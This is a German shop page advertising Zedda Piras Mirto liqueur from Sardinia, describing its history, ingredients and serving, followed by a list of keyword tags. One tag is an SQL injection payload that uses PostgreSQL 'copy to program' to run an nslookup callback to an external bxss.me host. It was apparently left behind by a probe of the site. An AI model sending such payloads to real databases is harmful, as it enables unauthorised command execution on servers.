Zedda Piras – Sardiniens Likör Nr.1

Seit seiner Gründung im Jahr 1854 produziert das Haus Zedda Piras seinen Mirto nach traditionellen Verarbeitungsmethoden und mit strengen Qualitätskontrollen. Dafür werden in den jahrhundertealten Wäldern Sardiniens die Myrthenbeeren und –blätter zwischen Ende November und Januar von wild wachsenden Sträuchern gesammelt. Das geschieht sorgfältig von Hand, um die Pflanzen nicht zu beschädigen und um die vollen und intensiven Aromen der Früchte zu erhalten, die der außergewöhnliche rubinrote Mirto (eine Besonderheit ist der weiße Mirto aus den Blättern der Pflanze) bei jedem Öffnen der Flasche verströmt. Im Glas lässt er die wahrhaft die berauschenden Aromen Sardiniens wiedererstehen und man sagt, dass man nach einem Mirto zum Digestif besonders intensiv träumt – wie in einer lauen sardischen Sommernacht nach einem heißen Tag.

Frische Beeren, Blätter, Alkohol, Wasser, Zucker – schon immer besteht der echte sardische Mirto ausschließlich aus diesen Zutaten. Nachdem die Beeren lange im Alkohol gelegen und ihre Farb- und Aromastoffe abgegeben haben, werden sie entfernt und die Flüssigkeit reift weiter. Mit reinem Wasser wird der richtige Alkoholgehalt des Zedda Piras erreicht und nach der Zugabe von Zucker kann das nochmals gefilterte Ergebnis schließlich in Flaschen abgefüllt werden. Um seinen Geschmack am Besten zu genießen, sollte der Mirto im Kühlschrank aufbewahrt und nach dem Essen in geeisten Gläsern serviert werden.

Die Liköre von Zedda Piras ab sofort bei BELVINI.DE

  • mirto sardischer digestif
  • myrthenbeeren
  • myrthenbeeren
  • mirto likör händler in pforzheim
  • kräuterschnaps aus sardinien
  • kräuterschnaps sardinien
  • testing';copy (select '') to program 'nslookup dns.sqli.55065.73502-6546.73502.7620e.1.bxss.me
  • testing